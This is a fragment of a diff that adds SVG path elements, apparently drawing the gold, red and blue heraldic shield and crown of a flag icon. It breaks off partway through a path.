+  <path fill="none" stroke="#000" stroke-width=".4" d="m230.4 196 1.5 1.1 2.1-3.4a7.9 7.9 0 0 1-3.8-7.6c.2-4.5 5.6-8.1 12.5-8.1 3.5 0 6.7 1 9 2.5l.2-1.9a18.6 18.6 0 0 0-9.2-2.3c-8 0-14.1 4.4-14.4 9.8a9.5 9.5 0 0 0 3.3 8l-1.2 2"/>
+  <path fill="#c8b100" d="M230.5 196a9.8 9.8 0 0 1-4.3-7.7c0-3.5 2.2-6.6 5.7-8.6a9.1 9.1 0 0 0-3.6 6.4 9.5 9.5 0 0 0 3.3 8l-1 2"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M230.5 196a9.8 9.8 0 0 1-4.3-7.7c0-3.5 2.2-6.6 5.7-8.6a9.1 9.1 0 0 0-3.6 6.4 9.5 9.5 0 0 0 3.3 8l-1 2"/>
+  <path fill="#c8b100" d="M206.8 199.6a9.4 9.4 0 0 1-2.5-6.3c0-1.4.4-2.8 1-4 2.1-4.5 9-7.8 17.1-7.8 2.2 0 4.4.2 6.3.7-.4.5-.8 1-1 1.5a27.2 27.2 0 0 0-5.3-.5c-7.4 0-13.6 3-15.4 6.8a7.5 7.5 0 0 0-.8 3.3 7.8 7.8 0 0 0 2.9 6l-2.7 4.4-1.5-1.2 1.9-3"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M206.8 199.6a9.4 9.4 0 0 1-2.5-6.3c0-1.4.4-2.8 1-4 2.1-4.5 9-7.8 17.1-7.8 2.2 0 4.4.2 6.3.7-.4.5-.8 1-1 1.5a27.2 27.2 0 0 0-5.3-.5c-7.4 0-13.6 3-15.4 6.8a7.5 7.5 0 0 0-.8 3.3 7.8 7.8 0 0 0 2.9 6l-2.7 4.4-1.5-1.2 1.9-3z"/>
+  <path fill="#c8b100" d="M209.5 184.8a11.3 11.3 0 0 0-4.2 4.4 9.2 9.2 0 0 0-1 4.1c0 2.4 1 4.6 2.5 6.3l-1.7 2.6a11.1 11.1 0 0 1-2.4-6.8c0-4.3 2.7-8.1 6.8-10.6"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M209.5 184.8a11.3 11.3 0 0 0-4.2 4.4 9.2 9.2 0 0 0-1 4.1c0 2.4 1 4.6 2.5 6.3l-1.7 2.6a11.1 11.1 0 0 1-2.4-6.8c0-4.3 2.7-8.1 6.8-10.6z"/>
+  <path fill="#c8b100" d="M255.8 175.4c1.7 0 3.3 1.2 3.7 2.8.2 1.4.4 3 .4 4.7v1.2c0 3.6.6 6.7 1.3 8.7l-5.5 5.2-5.5-5.2c.7-2 1.2-5.1 1.3-8.7v-1.2c0-1.7.2-3.3.5-4.7.3-1.6 2-2.8 3.7-2.8"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M255.8 175.4c1.7 0 3.3 1.2 3.7 2.8.2 1.4.4 3 .4 4.7v1.2c0 3.6.6 6.7 1.3 8.7l-5.5 5.2-5.5-5.2c.7-2 1.2-5.1 1.3-8.7v-1.2c0-1.7.2-3.3.5-4.7.3-1.6 2-2.8 3.7-2.8z"/>
+  <path fill="#c8b100" d="M255.8 177a2 2 0 0 1 1.9 1.5 30.6 30.6 0 0 1 .4 4.5v1.1c0 3.4.5 6.4 1.2 8.2l-3.6 3.5-3.6-3.5c.7-1.8 1.2-4.8 1.2-8.2V183c0-1.6.2-3.1.5-4.5.2-.8 1-1.4 2-1.4"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M255.8 177a2 2 0 0 1 1.9 1.5 30.6 30.6 0 0 1 .4 4.5v1.1c0 3.4.5 6.4 1.2 8.2l-3.6 3.5-3.6-3.5c.7-1.8 1.2-4.8 1.2-8.2V183c0-1.6.2-3.1.5-4.5.2-.8 1-1.4 2-1.4z"/>
+  <path fill="#c8b100" d="m281 196-1.4 1.1-2.2-3.4a7.9 7.9 0 0 0 3.9-7.6c-.2-4.5-5.7-8.1-12.5-8.1a16 16 0 0 0-9 2.5 24.5 24.5 0 0 0-.3-1.9 18.6 18.6 0 0 1 9.3-2.3c7.9 0 14 4.4 14.4 9.8a9.5 9.5 0 0 1-3.3 8l1.1 1.9"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="m281 196-1.4 1.1-2.2-3.4a7.9 7.9 0 0 0 3.9-7.6c-.2-4.5-5.7-8.1-12.5-8.1a16 16 0 0 0-9 2.5 24.5 24.5 0 0 0-.3-1.9 18.6 18.6 0 0 1 9.3-2.3c7.9 0 14 4.4 14.4 9.8a9.5 9.5 0 0 1-3.3 8l1.1 1.9"/>
+  <path fill="#c8b100" d="M280.9 196c2.7-2 4.4-4.7 4.4-7.7 0-3.5-2.3-6.6-5.7-8.6a9 9 0 0 1 3.6 7.3c0 2.8-1.3 5.4-3.3 7.2l1 1.9"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M280.9 196c2.7-2 4.4-4.7 4.4-7.7 0-3.5-2.3-6.6-5.7-8.6a9 9 0 0 1 3.6 7.3c0 2.8-1.3 5.4-3.3 7.2l1 1.9"/>
+  <path fill="#c8b100" d="M304.7 199.6a9.3 9.3 0 0 0 1.5-10.3c-2.2-4.5-9-7.8-17.2-7.8a28.4 28.4 0 0 0-6.3.7c.5.5.8 1 1.1 1.5a27.1 27.1 0 0 1 5.2-.5c7.5 0 13.7 3 15.5 6.8.5 1 .8 2.1.8 3.3a7.8 7.8 0 0 1-3 6l2.8 4.4 1.4-1.2-1.8-3"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M304.7 199.6a9.3 9.3 0 0 0 1.5-10.3c-2.2-4.5-9-7.8-17.2-7.8a28.4 28.4 0 0 0-6.3.7c.5.5.8 1 1.1 1.5a27.1 27.1 0 0 1 5.2-.5c7.5 0 13.7 3 15.5 6.8.5 1 .8 2.1.8 3.3a7.8 7.8 0 0 1-3 6l2.8 4.4 1.4-1.2-1.8-3z"/>
+  <path fill="#c8b100" d="M302 184.8a11.3 11.3 0 0 1 4.2 4.4 9.3 9.3 0 0 1 1 4.1c0 2.4-1 4.6-2.5 6.3l1.6 2.6a11.1 11.1 0 0 0 2.5-6.8c0-4.3-2.7-8.1-6.9-10.6"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M302 184.8a11.3 11.3 0 0 1 4.2 4.4 9.3 9.3 0 0 1 1 4.1c0 2.4-1 4.6-2.5 6.3l1.6 2.6a11.1 11.1 0 0 0 2.5-6.8c0-4.3-2.7-8.1-6.9-10.6z"/>
+  <path fill="#fff" d="M253.8 193.5c0-1 .9-1.9 2-1.9 1 0 1.9.9 1.9 1.9a1.9 1.9 0 0 1-2 1.8 1.9 1.9 0 0 1-2-1.8"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M253.8 193.5c0-1 .9-1.9 2-1.9 1 0 1.9.9 1.9 1.9a1.9 1.9 0 0 1-2 1.8 1.9 1.9 0 0 1-2-1.8z"/>
+  <path fill="#fff" stroke="#000" stroke-width=".4" d="M253.8 189.8a1.9 1.9 0 0 1 2-1.8 1.9 1.9 0 0 1 1.9 1.9 1.9 1.9 0 0 1-2 1.8 1.9 1.9 0 0 1-2-1.8m.5-4c0-.8.7-1.4 1.5-1.4.9 0 1.6.6 1.6 1.5 0 .8-.7 1.4-1.6 1.4-.8 0-1.5-.6-1.5-1.4m.4-3.6c0-.5.5-1 1.1-1a1 1 0 0 1 1.2 1c0 .6-.5 1.1-1.2 1.1a1.1 1.1 0 0 1-1-1m.1-3.1c0-.5.4-.9 1-.9s.8.4.8.9-.4.8-.9.8-.9-.3-.9-.8"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".4" d="m255.9 204.6 1.3.2a5 5 0 0 0 4.8 6.4 5 5 0 0 0 4.8-3.3s.4-1.7.6-1.7c.2 0 .2 1.9.3 1.9.3 2.4 2.5 4 5 4a4.9 4.9 0 0 0 5-5.4l1.5-1.5.9 2a4.3 4.3 0 0 0-.5 2 4.7 4.7 0 0 0 4.8 4.6 5 5 0 0 0 4-2l1-1.3v1.6c0 1.5.7 3 2.2 3.2 0 0 1.8.1 4.1-1.7a28 28 0 0 0 3.7-3.4l.2 1.9s-2 3-4 4.2c-1.2.7-3 1.4-4.4 1.1-1.5-.2-2.6-1.4-3.1-2.7a7.2 7.2 0 0 1-3.6 1 7 7 0 0 1-6.5-4 7.5 7.5 0 0 1-11-.3 7.4 7.4 0 0 1-5 1.9 7.4 7.4 0 0 1-6.1-3.1 7.3 7.3 0 0 1-6.1 3 7.4 7.4 0 0 1-5-1.8 7.5 7.5 0 0 1-11 .3 7 7 0 0 1-6.5 4 7.1 7.1 0 0 1-3.6-1c-.6 1.3-1.6 2.5-3.1 2.8-1.4.2-3.2-.5-4.3-1.2-2.2-1.2-4.1-4.3-4.1-4.3l.2-1.8s1.3 1.5 3.6 3.4c2.4 1.8 4.2 1.7 4.2 1.7 1.5-.2 2.2-1.7 2.2-3.2v-1.6l1 1.3a4.9 4.9 0 0 0 4 2c2.6 0 4.8-2 4.8-4.6 0-.7-.2-1.4-.5-2l.8-2 1.6 1.5v.6a4.9 4.9 0 0 0 5 4.8c2.5 0 4.7-1.7 5-4 0 0 0-1.9.2-1.9s.7 1.8.7 1.7a5 5 0 0 0 4.8 3.3 4.9 4.9 0 0 0 4.8-6.4l1.3-.2"/>
+  <path fill="#fff" stroke="#000" stroke-width=".4" d="M290.5 210.8c.3-.8 0-1.7-.6-1.8-.6-.2-1.4.3-1.6 1.2-.3.8 0 1.7.5 1.8.6.2 1.4-.3 1.7-1.2m-22-4.2c.2-.9-.2-1.6-.9-1.7-.6-.1-1.2.5-1.3 1.4-.1 1 .3 1.7 1 1.8.6 0 1.2-.6 1.3-1.5m-25.4 0c-.1-.9.3-1.6 1-1.7.6-.1 1.2.5 1.3 1.4.1 1-.3 1.7-1 1.8-.6 0-1.2-.6-1.3-1.5m-22 4.3c-.2-.9 0-1.7.7-2 .6-.1 1.3.4 1.6 1.3.3.8 0 1.7-.6 1.9-.6.1-1.3-.4-1.6-1.2"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".4" d="M230.8 196.3a5.5 5.5 0 0 1 2.4 3s0-.2.7-.6c.6-.3 1.1-.3 1.1-.3l-.2 1.4c-.1.3-.1 1.4-.4 2.3a7.8 7.8 0 0 1-.6 1.8 2 2 0 0 0-1.6-.5 2 2 0 0 0-1.4 1s-.7-.6-1.2-1.4l-1.2-2.2-.7-1.2h1.1c.7.1 1 .3 1 .3a5.2 5.2 0 0 1 1-3.7"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".4" d="M231.3 206.7a1.9 1.9 0 0 1-.7-1.1 1.7 1.7 0 0 1 .2-1.3l-1.9-.7c-.7-.2-2-.2-2.4-.2h-1.2l.3.6.5.7a5.4 5.4 0 0 0-3 2.2 5.6 5.6 0 0 0 3.6 1l-.2.8v.7l1-.4c.4-.2 1.6-.6 2.2-1 .9-.6 1.6-1.3 1.6-1.3m2.9-.5a1.8 1.8 0 0 0 .2-1.2 1.8 1.8 0 0 0-.7-1.1s.7-.8 1.5-1.3l2.3-1 1-.4v.6l-.2.9a5.6 5.6 0 0 1 3.7 1 5.4 5.4 0 0 1-3.1 2.1 7.1 7.1 0 0 0 .8 1.4h-1.2c-.4 0-1.7 0-2.4-.3-1-.2-2-.7-2-.7"/>
+  <path fill="#ad1519" stroke="#000" stroke-width=".4" d="M230.3 205.3c0-1.2 1-2.1 2.2-2.1 1.3 0 2.3.9 2.3 2 0 1.2-1 2.2-2.3 2.2a2.2 2.2 0 0 1-2.2-2.1"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".4" d="M255.8 192.9a6 6 0 0 1 2 3.9s.2-.3 1-.6 1.2-.1 1.2-.1l-.5 1.4c-.2.4-.4 1.6-.9 2.6a8.8 8.8 0 0 1-1 1.8 2.3 2.3 0 0 0-1.8-.7c-.6 0-1.3.3-1.7.7 0 0-.6-.7-1-1.8-.5-1-.7-2.2-.9-2.6l-.6-1.4s.6-.1 1.3.2c.8.2 1 .5 1 .5a6 6 0 0 1 2-4"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".4" d="M254.2 204.6a2 2 0 0 1-.6-1.3c0-.6.2-1 .6-1.4 0 0-1-.7-2-1.1-.8-.4-2.2-.6-2.6-.7l-1.3-.3.1.7.4 1c-1.5 0-2.9.8-3.9 1.8a6.3 6.3 0 0 0 4 1.8l-.5 1-.2.6 1.4-.2 2.6-.7 2-1.2m3.3 0c.3-.3.5-.8.5-1.3a2 2 0 0 0-.5-1.4s1-.7 2-1.1c.8-.4 2.2-.6 2.6-.7l1.3-.3-.2.7a7.6 7.6 0 0 1-.4 1 6 6 0 0 1 4 1.8 6.3 6.3 0 0 1-4 1.8l.4 1 .2.6-1.3-.2-2.6-.7a13 13 0 0 1-2-1.2m23.5-8.4a5.5 5.5 0 0 0-2.4 3.1l-.7-.6c-.6-.3-1.1-.3-1.1-.3l.2 1.4.3 2.3.7 1.8a2 2 0 0 1 1.6-.5 2 2 0 0 1 1.4 1l1.2-1.4 1.2-2.2.7-1.2h-1.2c-.7.1-.9.3-.9.3a5.2 5.2 0 0 0-1-3.7"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".4" d="M280.5 206.7c.3-.3.6-.7.7-1.1a1.8 1.8 0 0 0-.2-1.3l1.8-.7c.8-.2 2-.2 2.5-.2h1.1l-.2.6-.6.7a5.4 5.4 0 0 1 3.1 2.2 5.6 5.6 0 0 1-3.6 1l.2.8v.7l-1-.4-2.3-1a11.5 11.5 0 0 1-1.5-1.3m-2.9-.5a1.8 1.8 0 0 1-.3-1.2c.1-.5.4-.9.7-1.1 0 0-.7-.8-1.5-1.3-.6-.4-1.8-.9-2.2-1l-1-.4v.6c0 .5.2.9.2.9a5.6 5.6 0 0 0-3.7 1c.7 1 1.8 1.8 3 2.1l-.4.8a4 4 0 0 0-.3.6h1.2c.4 0 1.7 0 2.4-.3 1-.2 1.9-.7 1.9-.7"/>
+  <path fill="#ad1519" stroke="#000" stroke-width=".4" d="M277 205.3c0-1.2 1-2.1 2.2-2.1 1.3 0 2.3.9 2.3 2 0 1.2-1 2.2-2.3 2.2a2.2 2.2 0 0 1-2.2-2.1m24.8 4.6c-.5-.5-1.6-.4-2.4.3-.8.7-1 1.7-.5 2.2s1.6.5 2.4-.2c.8-.7 1-1.7.5-2.3"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".4" d="M298.7 211.3c0-.4.4-.8.7-1.1.8-.7 2-.8 2.4-.3l.2.3s1.2-2.1 2.5-2.9 3.6-.5 3.6-.5a3 3 0 0 0-3.1-3c-1 0-2 .5-2.5 1.2l-.3-1.1s-1.4.3-2 1.8c-.6 1.7 0 4 0 4s-.3-1-.8-1.7a8.5 8.5 0 0 0-2.6-1.7l-1.4-.8v1.5a8.4 8.4 0 0 0-4 .5 5 5 0 0 0 2.7 2.3l-.8.8-.5.5 1.4.2c.4 0 1.8.3 2.7.2a15.7 15.7 0 0 0 1.8-.2m-85.6 0a2.3 2.3 0 0 0-.8-1.1c-.8-.7-1.9-.8-2.4-.3a1.1 1.1 0 0 0-.2.3s-1-2.1-2.4-2.9-3.6-.5-3.6-.5a3 3 0 0 1 3-3c1 0 2 .5 2.6 1.2l.2-1.1s1.4.3 2 1.9c.7 1.6 0 3.9 0 3.9s.4-1 .9-1.7 1.8-1.4 2.5-1.7l1.4-.8a7.4 7.4 0 0 0 0 1.5 8.4 8.4 0 0 1 4 .5 5 5 0 0 1-2.7 2.3l.9.8.4.5-1.3.2c-.4 0-1.9.3-2.7.2a15.7 15.7 0 0 1-1.8-.2"/>
+  <path fill="#ad1519" stroke="#000" stroke-width=".4" d="M210 210c.5-.6 1.5-.5 2.3.2.9.7 1 1.7.6 2.2-.6.6-1.6.5-2.4-.2-.9-.7-1.1-1.7-.6-2.3m43.7-6.6c0-1.2 1-2.1 2.3-2.1s2.2.9 2.2 2-1 2.2-2.3 2.2a2.2 2.2 0 0 1-2.2-2.1"/>
+  <path fill="#005bbf" stroke="#000" stroke-width=".3" d="M251.2 171.3c0-2.4 2-4.3 4.6-4.3 2.5 0 4.5 2 4.5 4.3a4.4 4.4 0 0 1-4.5 4.3 4.4 4.4 0 0 1-4.6-4.3"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".3" d="M254.6 159.3v2.3H252v2.3h2.5v6.8h-3.2l-.2.6c0 .6.2 1.2.4 1.7h8.3a4.1 4.1 0 0 0 .4-1.7l-.2-.6h-3V164h2.4v-2.3H257v-2.3h-2.5z"/>
+  <path fill="#ccc" d="M256.2 352.6a87.4 87.4 0 0 1-37.8-8.8 24.2 24.2 0 0 1-13.7-21.6V288h102.8v34c0 9.5-5.4 17.7-13.7 21.8a86.4 86.4 0 0 1-37.6 8.7"/>
+  <path fill="none" stroke="#000" stroke-width=".5" d="M256.2 352.6a87.4 87.4 0 0 1-37.8-8.8 24.2 24.2 0 0 1-13.7-21.6V288h102.8v34c0 9.5-5.4 17.7-13.7 21.8a86.4 86.4 0 0 1-37.6 8.7z"/>
+  <path fill="#ccc" d="M256 288h51.5v-57H256v57z"/>
+  <path fill="none" stroke="#000" stroke-width=".5" d="M256 288h51.5v-57H256v57z"/>
+  <path fill="#ad1519" d="M256 322.1a25 25 0 0 1-25.6 24.4c-14.2 0-25.8-11-25.8-24.4V288H256v34"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".5" d="M215.8 342.3c1.7.8 3.9 2.2 6.2 2.8l-.1-58.3h-6v55.4z"/>
+  <path fill="#c8b100" stroke="#000" stroke-linejoin="round" stroke-width=".5" d="M204.5 321.7a26 26 0 0 0 6 16v-50.6h-5.9v34.6z"/>
+  <path fill="#c7b500" stroke="#000" stroke-width=".5" d="M227.3 346.4c2.4.2 4.1.2 6 0v-59.6h-6v59.6z"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".5" d="M238.6 345a20.3 20.3 0 0 0 6.2-2.6v-55.6h-6l-.2 58.3z"/>
+  <path fill="#ad1519" d="M204.6 288H256v-57h-51.4v57z"/>
+  <path fill="none" stroke="#000" stroke-width=".5" d="M204.6 288H256v-57h-51.4v57z"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".5" d="M250.4 337.1c2.5-2.2 4.9-7.3 5.7-13l.2-37.3h-6V337z"/>
+  <path fill="none" stroke="#000" stroke-width=".5" d="M256 322.1a25 25 0 0 1-25.6 24.4c-14.2 0-25.8-11-25.8-24.4V288H256v34"/>
+  <path fill="#ad1519" d="M307.6 288v34a25.1 25.1 0 0 1-25.8 24.4c-14.2 0-25.8-11-25.8-24.4v-34h51.6"/>
+  <path fill="none" stroke="#000" stroke-width=".5" d="M307.6 288v34a25.1 25.1 0 0 1-25.8 24.4c-14.2 0-25.8-11-25.8-24.4v-34h51.6"/>
+  <path fill="#c8b100" d="m265.4 313.7.1.6c0 .6-.5 1.1-1.2 1.1-.6 0-1.2-.5-1.2-1.1 0-.2 0-.4.2-.5h-1.7a2.7 2.7 0 0 0 1.9 3v4.1h1.7v-4.1a2.7 2.7 0 0 0 1.8-1.7h4.7v-1.4h-6.3m23.1 0v1.4h-4.2a2.7 2.7 0 0 1-.3.6l5 5.6-1.4 1-4.9-5.6-.2.1v9.3h-1.8v-9.3l-.2-.1-5 5.6-1.4-1 5.1-5.7a2.3 2.3 0 0 1-.2-.5h-4.4v-1.4h14zm2.8 0v1.4h4.8c.2.8.9 1.4 1.7 1.7v4.1h1.8v-4.1a2.7 2.7 0 0 0 2-2.5l-.2-.6h-1.6a1.2 1.2 0 0 1-1 1.7c-.8 0-1.3-.5-1.3-1.1l.1-.5h-6.3m-7 23.5a16.6 16.6 0 0 0 3.8-1l.9 1.4a18.8 18.8 0 0 1-4.6 1.3 2.8 2.8 0 0 1-2.8 2 2.8 2.8 0 0 1-2.7-2 18.7 18.7 0 0 1-4.8-1.3l.8-1.5c1.3.6 2.7 1 4.2 1.2a2.7 2.7 0 0 1 1.6-1.5v-7.1h1.8v7.1a3 3 0 0 1 1.7 1.4zm-11.8-2.4-.9 1.5a17.8 17.8 0 0 1-3.9-3.3 3 3 0 0 1-2.6-.5 2.5 2.5 0 0 1-.4-3.7l.2-.2a16.3 16.3 0 0 1-1.4-5.1h1.8a14 14 0 0 0 1.1 4.4 3.1 3.1 0 0 1 1.5.1l4.4-4.8 1.3 1-4.4 4.9a2.5 2.5 0 0 1 0 3 16.2 16.2 0 0 0 3.2 2.7zm-6.5-5a1.2 1.2 0 0 1 1.7-.2 1 1 0 0 1 0 1.6 1.3 1.3 0 0 1-1.6.2 1.1 1.1 0 0 1-.1-1.6zm-2.2-4.8-1.8-.4-.3-4.6 1.8-.6v2.6c0 1 0 2 .2 3zm1.4-5.7 1.8.4v2.3c0-.8.3 2.3.3 2.3l-1.8.6-.3-2.9v-2.7zm6 14.6a16.7 16.7 0 0 0 5.1 2.7l.4-1.7a14.6 14.6 0 0 1-4.3-2.1l-1.2 1m-1 1.6a18.6 18.6 0 0 0 5.2 2.7l-1.3 1.3a20 20 0 0 1-4.2-2.2l.4-1.8m2.3-10 1.7.7 3.2-3.5-1-1.5-3.9 4.2m-1.3-1-1-1.5 3.1-3.5 1.7.7-3.8 4.3m19.3 10.5.9 1.5a17.8 17.8 0 0 0 3.8-3.3c1 .3 2 .1 2.7-.5a2.5 2.5 0 0 0 .3-3.7l-.1-.2c.7-1.6 1.2-3.3 1.3-5.1h-1.7a14.2 14.2 0 0 1-1.2 4.4 3.1 3.1 0 0 0-1.5.1l-4.3-4.8-1.3 1 4.3 4.9a2.5 2.5 0 0 0 .1 3 16 16 0 0 1-3.3 2.7zm6.5-5a1.2 1.2 0 0 0-1.7-.2 1.1 1.1 0 0 0-.1 1.6c.4.5 1.2.6 1.7.1a1 1 0 0 0 0-1.6zm2.2-4.8 1.8-.5.2-4.5-1.7-.6v2.6l-.3 3zm-1.5-5.7-1.8.4v2.3c0-.8-.3 2.3-.3 2.3l1.9.6.2-2.9v-2.7m-6 14.6a16.8 16.8 0 0 1-5 2.7l-.5-1.7a14.6 14.6 0 0 0 4.3-2.1l1.3 1m.9 1.6a18.6 18.6 0 0 1-5.2 2.7l1.3 1.3a20 20 0 0 0 4.3-2.2l-.4-1.8m-2.4-10-1.7.7-3.1-3.5 1-1.5 3.8 4.2m1.4-1 1-1.5-3.2-3.5-1.7.7 3.8 4.3m-21.4-9.3.5 1.7h4.8l.6-1.7h-5.9m22.5 0-.5 1.7h-4.8l-.5-1.7h5.9m-12.4 23.3c0-.6.5-1.1 1.2-1.1.6 0 1.1.5 1.1 1.1 0 .7-.5 1.2-1.2 1.2s-1.2-.6-1.2-1.2zm2-8.2 1.8-.5V325l-1.8-.5v5.6m-1.8 0-1.8-.5V325l1.8-.5v5.6"/>
+  <path fill="#c8b100" d="M261.6 313.8c.2-1 1-1.7 1.9-2V306h1.7v5.7c.9.3 1.6.9 1.8 1.7h4.7v.3h-6.3a1.2 1.2 0 0 0-1-.6 1.2 1.2 0 0 0-1.1.6h-1.7m13 0v-.3h4.4l.2-.4-5.4-6 1.3-1 5.3 5.8h.3v-8h1.7v7.9h.3l5.2-5.8 1.3 1-5.2 5.9.3.6h4.2v.3h-13.9zm23 0a1.2 1.2 0 0 1 1.1-.6c.5 0 .9.2 1 .6h1.7a2.7 2.7 0 0 0-1.8-2V306h-1.8v5.7a2.7 2.7 0 0 0-1.8 1.7h-4.6v.3h6.3m-32.2-16 6.5 7.3 1.3-1-6.5-7.3.3-.6h4.7v-1.6h-4.7a2.8 2.8 0 0 0-2.7-1.9 2.7 2.7 0 0 0-2.8 2.7c0 1.1.8 2.1 1.9 2.5v5.6h1.7v-5.6h.3zm34 .1v5.6h-1.7v-5.6a2.6 2.6 0 0 1-.4-.2L291 305l-1.3-1 6.5-7.5a2.4 2.4 0 0 1-.1-.3h-4.8v-1.6h4.8a2.8 2.8 0 0 1 2.6-1.9c1.6 0 2.8 1.2 2.8 2.7 0 1.2-.8 2.2-2 2.5zm-17 0v3.4h-1.8V298a2.7 2.7 0 0 1-1.8-1.7h-4.3v-1.6h4.3a2.8 2.8 0 0 1 2.6-1.9c1.3 0 2.3.8 2.7 1.9h4.3v1.6h-4.3a2.7 2.7 0 0 1-1.7 1.7zm-19 4.1-1.8.5v4.6l1.8.5V302m1.8 0 1.8.5v4.6l-1.8.5V302m32.5 0-1.8.5v4.6l1.8.5V302m1.8 0 1.8.5v4.6l-1.8.5V302m-27.3 1 1.7-.8 3.2 3.5-1 1.5-3.9-4.2m-1.3 1-1 1.5 3 3.5 1.8-.7-3.8-4.3m19.7-1.2-1.8-.7-3 3.5 1 1.5 3.8-4.3m1.3 1 1 1.6-3 3.5-1.8-.7 3.8-4.3m-21.7 9.6.5-1.7h4.8l.6 1.7h-5.9m-7-18.1c0-.6.5-1.2 1.1-1.2.7 0 1.2.5 1.2 1.2s-.5 1.1-1.2 1.1c-.6 0-1.2-.5-1.2-1.1zm12.8.8-.5 1.7h-4.8l-.5-1.7h5.8m0-1.7-.5-1.7h-4.8l-.5 1.7h5.8m16.7 19-.5-1.7h-4.8l-.5 1.7h5.9m4.6-18.1c0-.6.6-1.2 1.2-1.2.7 0 1.2.5 1.2 1.2s-.5 1.1-1.2 1.1c-.6 0-1.2-.5-1.2-1.1zm-17.2 0c0-.6.6-1.2 1.2-1.2s1.2.5 1.2 1.2-.5 1.1-1.2 1.1c-.6 0-1.2-.5-1.2-1.1zm6.7.8.6 1.7h4.8l.5-1.7H287m0-1.6.5-1.8h4.9l.5 1.7H287m-6.3 5.4-1.8.5v4.6l1.8.5v-5.6m1.7 0 1.8.5v4.6l-1.8.5v-5.6"/>
+  <path fill="none" stroke="#c8b100" stroke-width=".3" d="M284.2 337.3a16.6 16.6 0 0 0 4-1l.8 1.4a18.8 18.8 0 0 1-4.6 1.3 2.8 2.8 0 0 1-2.8 2 2.8 2.8 0 0 1-2.7-2 18.7 18.7 0 0 1-4.8-1.3l.8-1.5c1.3.6 2.7 1 4.2 1.1a2.7 2.7 0 0 1 1.6-1.4v-7.2h1.8v7.2a2.8 2.8 0 0 1 1.7 1.4zm-5-21.7a2.4 2.4 0 0 1-.2-.5h-4.4v-1.6h4.4c0-.2 0-.3.2-.4l-5.4-6 1.3-1 5.3 5.8a2.2 2.2 0 0 1 .3-.1V304h1.7v7.7l.3.1 5.2-5.9 1.3 1-5.2 6 .3.6h4.2v1.6h-4.2l-.3.6 5 5.6-1.4 1-4.9-5.6-.2.1v9.3h-1.8v-9.3l-.2-.1-5 5.6-1.4-1 5.1-5.7m-13.7-17.7 6.5 7.2 1.3-1-6.5-7.3.3-.6h4.7v-1.7h-4.7a2.8 2.8 0 0 0-2.7-1.8 2.7 2.7 0 0 0-2.8 2.7c0 1.1.8 2.1 1.9 2.5v5.5h1.7V298h.3zm7 37-.9 1.5a17.8 17.8 0 0 1-3.9-3.3c-.9.3-1.9.1-2.6-.5a2.5 2.5 0 0 1-.3-3.7v-.2a16.3 16.3 0 0 1-1.3-5.1h1.8a14 14 0 0 0 1.1 4.4 3.1 3.1 0 0 1 1.5.1l4.4-4.8 1.3 1-4.3 4.9a2.5 2.5 0 0 1-.1 3 16.2 16.2 0 0 0 3.3 2.7zm-9-14v-4a2.7 2.7 0 0 1-2-2.6c0-1.2.9-2.2 2-2.6v-5.6h1.7v5.7c.9.2 1.5.9 1.8 1.7h4.7v1.6H267a2.7 2.7 0 0 1-1.8 1.7v4.1h-1.7m2.5 9a1.2 1.2 0 0 1 1.7-.2c.5.4.5 1.1 0 1.6a1.3 1.3 0 0 1-1.6.1 1.1 1.1 0 0 1-.1-1.6zm-2.2-4.9-1.8-.4-.3-4.5 1.8-.6v2.6c0 1 0 2 .3 3zm1.5-5.6 1.7.4a64.3 64.3 0 0 0 .3 4.6l-1.8.6-.3-2.9v-2.7zm5.9 14.6a16.7 16.7 0 0 0 5.1 2.7l.4-1.7a14.6 14.6 0 0 1-4.3-2.2l-1.2 1.2m-1 1.5a18.6 18.6 0 0 0 5.3 2.7l-1.4 1.2a20 20 0 0 1-4.2-2.1l.4-1.8"/>
+  <path fill="none" stroke="#c8b100" stroke-width=".3" d="m272.6 325.4 1.7.8 3.2-3.5-1-1.5-3.9 4.2m-1.3-1-1-1.5 3.1-3.5 1.7.7-3.8 4.3m-8.2-10.1c0-.7.6-1.2 1.2-1.2.7 0 1.2.5 1.2 1.2 0 .6-.5 1.1-1.2 1.1-.6 0-1.2-.5-1.2-1.1zm27.5 20.6.8 1.5a17.8 17.8 0 0 0 4-3.3c.8.3 1.8.1 2.6-.5a2.5 2.5 0 0 0 .3-3.7l-.2-.2c.8-1.6 1.2-3.3 1.4-5.1h-1.7a14.2 14.2 0 0 1-1.2 4.4 3.1 3.1 0 0 0-1.5.1l-4.3-4.8-1.4 1 4.4 4.9a2.5 2.5 0 0 0 .1 3 16 16 0 0 1-3.3 2.7zm9-14v-4.1a2.7 2.7 0 0 0 2-2.5 2.7 2.7 0 0 0-2-2.6v-5.6h-1.8v5.7c-.8.2-1.5.9-1.8 1.7h-4.7v1.6h4.8a2.7 2.7 0 0 0 1.7 1.7v4.1h1.8zm-2.5 9a1.2 1.2 0 0 0-1.7-.2 1.1 1.1 0 0 0-.1 1.6c.4.5 1.1.6 1.7.1a1 1 0 0 0 0-1.6zm2.2-4.8 1.8-.4.2-4.6-1.7-.6v2.6l-.3 3zm-1.5-5.7-1.8.4v2.3c0-.8-.3 2.3-.3 2.3l1.9.6.2-2.9v-2.7m1.8-21.5v5.5h-1.8V298a2.4 2.4 0 0 1-.4-.2L291 305l-1.3-1.1 6.5-7.4a2.5 2.5 0 0 1-.1-.3h-4.8v-1.7h4.8a2.8 2.8 0 0 1 2.6-1.8c1.6 0 2.8 1.2 2.8 2.7 0 1.2-.8 